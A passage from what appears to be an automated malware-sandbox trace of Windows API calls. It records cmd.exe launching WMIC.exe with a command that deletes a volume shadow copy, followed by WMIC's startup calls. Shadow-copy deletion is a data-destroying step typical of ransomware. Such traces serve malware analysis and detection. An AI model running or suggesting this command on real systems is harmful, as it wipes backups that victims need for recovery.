Locale=0x409, LCType=0xe, lpLCData=0x4a1c7b40, cchData=8 | out: lpLCData=".") returned 2 [0089.669] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a1da4e0, cchData=8 | out: lpLCData=",") returned 2 [0089.669] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0089.670] GetProcessHeap () returned 0x280000 [0089.670] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20c) returned 0x2997e0 [0089.670] GetConsoleTitleW (in: lpConsoleTitle=0x2997e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0089.670] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0089.670] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0089.670] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0089.670] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0089.671] GetProcessHeap () returned 0x280000 [0089.671] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4012) returned 0x29ce50 [0089.671] GetProcessHeap () returned 0x280000 [0089.671] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29ce50 | out: hHeap=0x280000) returned 1 [0089.673] _wcsicmp (_String1="C:\\Windows\\System32\\wbem\\WMIC.exe", _String2=")") returned 58 [0089.673] _wcsicmp (_String1="FOR", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0089.673] _wcsicmp (_String1="FOR/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0089.673] _wcsicmp (_String1="IF", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0089.673] _wcsicmp (_String1="IF/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0089.673] _wcsicmp (_String1="REM", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0089.673] _wcsicmp (_String1="REM/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0089.673] GetProcessHeap () returned 0x280000 [0089.673] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xb0) returned 0x299a00 [0089.673] GetProcessHeap () returned 0x280000 [0089.673] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x54) returned 0x299ac0 [0089.676] GetProcessHeap () returned 0x280000 [0089.676] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x9e) returned 0x299b20 [0089.676] GetConsoleTitleW (in: lpConsoleTitle=0x1ef650, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0089.677] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0089.677] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0089.677] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1ef1e0, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1ef1c0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ef1c0*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0089.677] GetProcessHeap () returned 0x280000 [0089.677] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x218) returned 0x299bd0 [0089.677] GetProcessHeap () returned 0x280000 [0089.677] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xe2) returned 0x299df0 [0089.677] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0089.677] GetProcessHeap () returned 0x280000 [0089.677] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x420) returned 0x281320 [0089.677] SetErrorMode (uMode=0x0) returned 0x8001 [0089.677] SetErrorMode (uMode=0x1) returned 0x0 [0089.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\wbem\\.", nBufferLength=0x208, lpBuffer=0x281330, lpFilePart=0x1eeee0 | out: lpBuffer="C:\\Windows\\System32\\wbem", lpFilePart=0x1eeee0*="wbem") returned 0x18 [0089.677] SetErrorMode (uMode=0x8001) returned 0x1 [0089.677] GetProcessHeap () returned 0x280000 [0089.677] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x281320, Size=0x54) returned 0x281320 [0089.677] GetProcessHeap () returned 0x280000 [0089.678] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x281320) returned 0x54 [0089.678] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\System32\\wbem\\.") returned 1 [0089.678] GetProcessHeap () returned 0x280000 [0089.678] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x48) returned 0x299ee0 [0089.678] GetProcessHeap () returned 0x280000 [0089.678] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x7c) returned 0x299f30 [0089.678] GetProcessHeap () returned 0x280000 [0089.678] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x299f30, Size=0x48) returned 0x299f30 [0089.678] GetProcessHeap () returned 0x280000 [0089.678] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x299f30) returned 0x48 [0089.678] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1bf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0089.678] GetProcessHeap () returned 0x280000 [0089.678] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xe8) returned 0x299f90 [0089.681] GetProcessHeap () returned 0x280000 [0089.681] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x299f90, Size=0x7e) returned 0x299f90 [0089.681] GetProcessHeap () returned 0x280000 [0089.681] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x299f90) returned 0x7e [0089.682] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0089.682] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\wbem\\WMIC.exe", fInfoLevelId=0x1, lpFindFileData=0x1eec50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eec50) returned 0x29a020 [0089.683] GetProcessHeap () returned 0x280000 [0089.683] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x28) returned 0x2946c0 [0089.683] FindClose (in: hFindFile=0x29a020 | out: hFindFile=0x29a020) returned 1 [0089.683] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0089.683] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0089.683] GetConsoleTitleW (in: lpConsoleTitle=0x1ef1a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0089.683] InitializeProcThreadAttributeList (in: lpAttributeList=0x1eef58, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1eef18 | out: lpAttributeList=0x1eef58, lpSize=0x1eef18) returned 1 [0089.683] UpdateProcThreadAttribute (in: lpAttributeList=0x1eef58, dwFlags=0x0, Attribute=0x60001, lpValue=0x1eef08, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1eef58, lpPreviousValue=0x0) returned 1 [0089.683] GetStartupInfoW (in: lpStartupInfo=0x1ef070 | out: lpStartupInfo=0x1ef070*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0089.683] GetProcessHeap () returned 0x280000 [0089.683] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x20) returned 0x2946f0 [0089.683] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0089.683] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0089.683] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0089.683] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0089.683] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0089.683] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0089.683] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0089.683] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0089.683] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0089.683] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0089.683] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0089.683] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0089.684] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0089.684] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0089.684] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0089.684] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0089.684] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0089.684] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0089.684] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0089.684] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0089.684] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0089.684] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0089.684] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0089.684] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0089.684] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0089.684] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0089.684] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0089.684] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0089.684] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0089.684] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0089.684] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0089.684] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0089.684] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0089.684] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0089.684] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0089.684] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0089.684] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0089.684] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0089.684] GetProcessHeap () returned 0x280000 [0089.684] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2946f0 | out: hHeap=0x280000) returned 1 [0089.684] GetProcessHeap () returned 0x280000 [0089.684] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x12) returned 0x298a30 [0089.684] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0089.685] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\wbem\\WMIC.exe", lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{84D74FA3-DE98-47B0-806B-7C5805D67A02}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1eef90*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{84D74FA3-DE98-47B0-806B-7C5805D67A02}'\" delete", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1eef40 | out: lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{84D74FA3-DE98-47B0-806B-7C5805D67A02}'\" delete", lpProcessInformation=0x1eef40*(hProcess=0x54, hThread=0x50, dwProcessId=0xaa0, dwThreadId=0xac8)) returned 1 [0089.689] CloseHandle (hObject=0x50) returned 1 [0089.689] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0089.689] GetProcessHeap () returned 0x280000 [0089.689] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29c360 | out: hHeap=0x280000) returned 1 [0089.689] GetEnvironmentStringsW () returned 0x29ad60* [0089.689] GetProcessHeap () returned 0x280000 [0089.689] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xae8) returned 0x29b850 [0089.689] FreeEnvironmentStringsW (penv=0x29ad60) returned 1 [0089.689] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0091.647] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x1eee88 | out: lpExitCode=0x1eee88*=0x0) returned 1 [0091.647] CloseHandle (hObject=0x54) returned 1 [0091.647] _vsnwprintf (in: _Buffer=0x1ef0f8, _BufferCount=0x13, _Format="%08X", _ArgList=0x1eee98 | out: _Buffer="00000000") returned 8 [0091.647] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0091.647] GetProcessHeap () returned 0x280000 [0091.647] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29b850 | out: hHeap=0x280000) returned 1 [0091.647] GetEnvironmentStringsW () returned 0x29ad60* [0091.647] GetProcessHeap () returned 0x280000 [0091.647] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xb0e) returned 0x29b880 [0091.647] FreeEnvironmentStringsW (penv=0x29ad60) returned 1 [0091.647] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0091.647] GetProcessHeap () returned 0x280000 [0091.647] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29b880 | out: hHeap=0x280000) returned 1 [0091.647] GetEnvironmentStringsW () returned 0x29ad60* [0091.648] GetProcessHeap () returned 0x280000 [0091.648] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xb0e) returned 0x29b880 [0091.648] FreeEnvironmentStringsW (penv=0x29ad60) returned 1 [0091.648] GetProcessHeap () returned 0x280000 [0091.648] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x298a30 | out: hHeap=0x280000) returned 1 [0091.648] DeleteProcThreadAttributeList (in: lpAttributeList=0x1eef58 | out: lpAttributeList=0x1eef58) [0091.648] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.648] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0091.648] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.648] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1be194 | out: lpMode=0x4a1be194) returned 1 [0091.648] _get_osfhandle (_FileHandle=0) returned 0x3 [0091.648] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1be198 | out: lpMode=0x4a1be198) returned 1 [0091.648] SetConsoleInputExeNameW () returned 0x1 [0091.649] GetConsoleOutputCP () returned 0x1b5 [0091.649] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1cbfe0 | out: lpCPInfo=0x4a1cbfe0) returned 1 [0091.649] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0091.649] exit (_Code=0) Process: id = "13" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x1a05000" os_pid = "0xaa0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "12" os_parent_pid = "0xaac" cmd_line = "C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{84D74FA3-DE98-47B0-806B-7C5805D67A02}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 123 os_tid = 0xac8 [0089.725] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28f910 | out: lpSystemTimeAsFileTime=0x28f910*(dwLowDateTime=0x3d18ad30, dwHighDateTime=0x1d68245)) [0089.725] GetCurrentProcessId () returned 0xaa0 [0089.725] GetCurrentThreadId () returned 0xac8 [0089.725] GetTickCount () returned 0x114c35f [0089.725] QueryPerformanceCounter (in: lpPerformanceCount=0x28f918 | out: lpPerformanceCount=0x28f918*=20961812982) returned 1 [0089.725] GetModuleHandleW (lpModuleName=0x0) returned 0xff4e0000 [0089.725] __set_app_type (_Type=0x1) [0089.725] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff52ced0) returned 0x0 [0089.725] __wgetmainargs (in: _Argc=0xff552380, _Argv=0xff552390, _Env=0xff552388, _DoWildCard=0, _StartInfo=0xff55239c | out: _Argc=0xff552380, _Argv=0xff552390, _Env=0xff552388) returned 0 [0089.726] ??0CHString@@QEAA@XZ () returned 0xff552ab0 [0089.726] malloc (_Size=0x30) returned 0x3b5a50 [0089.726] malloc (_Size=0x70) returned 0x3b5a90 [0089.726] malloc (_Size=0x50) returned 0x3b7d30 [0089.726] malloc (_Size=0x30) returned 0x3b7d90 [0089.726] malloc (_Size=0x48) returned 0x3b7dd0 [0089.726] malloc (_Size=0x30) returned 0x3b7e20 [0089.726] malloc (_Size=0x30) returned 0x3b7e60 [0089.726] ??0CHString@@QEAA@XZ () returned 0xff552f58 [0089.726] malloc (_Size=0x30) returned 0x3b7ea0 [0089.726] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0089.726] SetConsoleCtrlHandler (HandlerRoutine=0xff525724, Add=1) returned 1 [0089.726] _onexit (_Func=0xff53f378) returned 0xff53f378 [0089.726] _onexit (_Func=0xff53f490) returned 0xff53f490 [0089.727] _onexit (_Func=0xff53f4d0) returned 0xff53f4d0 [0089.727] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0089.727] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0089.729] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0089.735] CoCreateInstance (in: rclsid=0xff4e73a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff4e7370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xff552940 | out: ppv=0xff552940*=0x1e51390) returned 0x0 [0089.742] GetCurrentProcess () returned 0xffffffffffffffff [0089.742] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x28f6e0 | out: TokenHandle=0x28f6e0*=0xf4) returned 1 [0089.742] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x28f6d8 | out: TokenInformation=0x0, ReturnLength=0x28f6d8) returned 0 [0089.742] malloc (_Size=0x118) returned 0x3b69a0 [0089.742] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x3b69a0, TokenInformationLength=0x118, ReturnLength=0x28f6d8 | out: TokenInformation=0x3b69a0, ReturnLength=0x28f6d8) returned 1 [0089.742] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x3b69a0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=1090139486, Attributes=0x892e), (Luid.LowPart=0x0, Luid.HighPart=3899104, Attributes=0x0), (Luid.LowPart=0x64006e, Luid.HighPart=7798895, Attributes=0x3b0073), (Luid.LowPart=0x57005c, Luid.HighPart=7209065, Attributes=0x6f0064), (Luid.LowPart=0x53005c, Luid.HighPart=7536761, Attributes=0x650074), (Luid.LowPart=0x5c0032, Luid.HighPart=6422615, Attributes=0x6d0065))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0089.742] free (_Block=0x3b69a0) [0089.742] CloseHandle (hObject=0xf4) returned 1 [0089.742] malloc (_Size=0x40) returned 0x3b7ee0 [0089.742] malloc (_Size=0x40) returned 0x3b7f30 [0089.742] malloc (_Size=0x40) returned 0x3b7f80 [0089.742] malloc (_Size=0x20a) returned 0x3b69a0 [0089.743] GetSystemDirectoryW (in: lpBuffer=0x3b69a0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0089.743] free (_Block=0x3b69a0) [0089.743] malloc (_Size=0x18) returned 0x3cdfb0 [0089.743] malloc (_Size=0x18) returned 0x3b69a0 [0089.743] malloc (_Size=0x18) returned 0x3b69c0 [0089.743] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0089.743] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0089.743] free (_Block=0x3cdfb0) [0089.743] free (_Block=0x3b69a0) [0089.743] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0089.743] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0089.743] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0089.744] FreeLibrary (hLibModule=0x77940000) returned 1 [0089.744] free (_Block=0x3b69c0) [0089.744] _vsnwprintf (in: _Buffer=0x3b7f80, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x28f308 | out: _Buffer="ms_409") returned 6 [0089.744] malloc (_Size=0x20) returned 0x3b69a0 [0089.744] GetComputerNameW (in: lpBuffer=0x3b69a0, nSize=0x28f6e0 | out: lpBuffer="XDUWTFONO", nSize=0x28f6e0) returned 1 [0089.744] lstrlenW (lpString="XDUWTFONO") returned 9 [0089.744] malloc (_Size=0x14) returned 0x3cdfb0 [0089.744] lstrlenW (lpString="XDUWTFONO") returned 9 [0089.744] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x28f6d8 | out: lpNameBuffer=0x0, nSize=0x28f6d8) returned 0x7fffffde000 [0089.745] GetLastError () returned 0xea [0089.745] malloc (_Size=0x40) returned 0x3b69d0 [0089.745] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x3b69d0, nSize=0x28f6d8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x28f6d8) returned 0x1 [0089.745] lstrlenW (lpString="") returned 0 [0089.745] lstrlenW (lpString="XDUWTFONO") returned 9 [0089.745] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0089.746] lstrlenW (lpString=".") returned 1 [0089.746] lstrlenW (lpString="XDUWTFONO") returned 9 [0089.746] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0089.746] lstrlenW (lpString="LOCALHOST") returned 9 [0089.746] lstrlenW (lpString="XDUWTFONO") returned 9 [0089.746] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0089.746] lstrlenW (lpString="XDUWTFONO") returned 9 [0089.746] lstrlenW (lpString="XDUWTFONO") returned 9 [0089.746] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0089.746] free (_Block=0x3cdfb0) [0089.746] lstrlenW (lpString="XDUWTFONO") returned 9 [0089.746] malloc (_Size=0x14) returned 0x3cdfb0 [0089.746] lstrlenW (lpString="XDUWTFONO") returned 9 [0089.746] lstrlenW (lpString="XDUWTFONO") returned 9 [0089.746] malloc (_Size=0x14) returned 0x3b6a20 [0089.746] lstrlenW (lpString="XDUWTFONO") returned 9 [0089.746] malloc (_Size=0x8) returned 0x3b6a40 [0089.746] malloc (_Size=0x18) returned 0x3b6a60 [0089.747] malloc (_Size=0x30) returned 0x3b6a80 [0089.747] malloc (_Size=0x18) returned 0x3b6ac0 [0089.747] SysStringLen (param_1="IDENTIFY") returned 0x8 [0089.747] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0089.747] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0089.747] SysStringLen (param_1="IDENTIFY") returned 0x8 [0089.747] malloc (_Size=0x30) returned 0x3b6ae0 [0089.747] malloc (_Size=0x18) returned 0x3b6b20 [0089.747] SysStringLen (param_1="IMPERSONATE") returned 0xb [0089.747] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0089.747] SysStringLen (param_1="IMPERSONATE") returned 0xb [0089.747] SysStringLen (param_1="IDENTIFY") returned 0x8 [0089.747] SysStringLen (param_1="IDENTIFY") returned 0x8 [0089.747] SysStringLen (param_1="IMPERSONATE") returned 0xb [0089.747] malloc (_Size=0x30) returned 0x3b6b40 [0089.747] malloc (_Size=0x18) returned 0x3b6b80 [0089.747] SysStringLen (param_1="DELEGATE") returned 0x8 [0089.747] SysStringLen (param_1="IDENTIFY") returned 0x8 [0089.747] SysStringLen (param_1="DELEGATE") returned 0x8 [0089.747] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0089.747] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0089.747] SysStringLen (param_1="DELEGATE") returned 0x8 [0089.747] malloc (_Size=0x30) returned 0x3b6ba0 [0089.747] malloc (_Size=0x18) returned 0x3b6be0 [0089.747] malloc (_Size=0x30) returned 0x3b6c00 [0089.747] malloc (_Size=0x18) returned 0x3b6c40 [0089.747] SysStringLen (param_1="NONE") returned 0x4 [0089.747] SysStringLen (param_1="DEFAULT") returned 0x7 [0089.747] SysStringLen (param_1="DEFAULT") returned 0x7 [0089.747] 